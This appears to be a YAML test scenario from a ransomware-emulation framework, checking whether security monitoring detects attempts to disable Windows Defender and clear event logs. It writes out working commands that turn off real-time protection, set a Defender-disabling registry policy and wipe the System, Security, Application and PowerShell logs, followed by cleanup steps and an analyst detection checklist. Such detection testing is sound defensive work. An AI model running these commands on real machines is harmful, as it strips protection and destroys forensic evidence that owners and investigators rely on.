id: RANSIM_P2_003_defender_eventlog_tamper
name: "Ransomware Phase 2 — Defender Disable and Event Log Clearing"
mitre: "T1562.001, T1070.001"
category: defense_evasion
description: >
  Ransomware attempts to disable Windows Defender real-time protection and clear
  event logs to remove forensic evidence before or during encryption. Tests whether
  attempts to disable AV and clear logs are detected, even when they fail due to
  Tamper Protection being enabled.

requirements:
  os: windows
  admin: true

steps:
  - type: marker
    message: "[RANSIM P2] Attempting to disable Windows Defender"

  - type: exec_powershell
    encoded: false
    command: |
      Set-MpPreference -DisableRealtimeMonitoring $true
      Write-Host "PAS: Defender disable attempted"
    timeout_seconds: 10

  - type: exec
    binary: cmd.exe
    args: /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    timeout_seconds: 10

  - type: sleep
    seconds: 15

  - type: marker
    message: "[RANSIM P2] Attempting to clear event logs"

  - type: exec
    binary: cmd.exe
    args: /c wevtutil cl System
    timeout_seconds: 10

  - type: exec
    binary: cmd.exe
    args: /c wevtutil cl Security
    timeout_seconds: 10

  - type: exec
    binary: cmd.exe
    args: /c wevtutil cl Application
    timeout_seconds: 10

  - type: exec
    binary: cmd.exe
    args: /c wevtutil cl "Microsoft-Windows-PowerShell/Operational"
    timeout_seconds: 10

  - type: sleep
    seconds: 20

  - type: marker
    message: "[RANSIM P2] Cleanup: re-enabling Defender"

  - type: exec_powershell
    encoded: false
    command: |
      Set-MpPreference -DisableRealtimeMonitoring $false
      Write-Host "PAS: Defender re-enabled"
    timeout_seconds: 10

  - type: reg_delete
    hive: HKLM
    key: "SOFTWARE\\Policies\\Microsoft\\Windows Defender"
    name: "DisableAntiSpyware"

analyst_checklist:
  - "EDR: Alert on Set-MpPreference -DisableRealtimeMonitoring? Critical signal."
  - "EDR: Was the attempt blocked by Tamper Protection? Did EDR log the blocked attempt?"
  - "EDR: Registry write to Defender policy key captured (Event ID 13)?"
  - "Windows Event ID 1102: Security log cleared — logged before clearing?"
  - "Windows Event ID 104: System log cleared — present?"
  - "EDR: wevtutil cl captured for all four log channels?"
  - "SIEM: Did you lose events after wevtutil ran? Check for gaps in the timeline."
  - "Rule opportunity (critical): PowerShell calling Set-MpPreference with disable flags"
  - "Rule opportunity (critical): wevtutil.exe with 'cl' argument on Security or System log"
  - "Rule opportunity: reg write to HKLM\\Policies\\Windows Defender\\DisableAntiSpyware"
  - "Gap check: If Event 1102 is missing, your SIEM may not be collecting it — common blind spot."
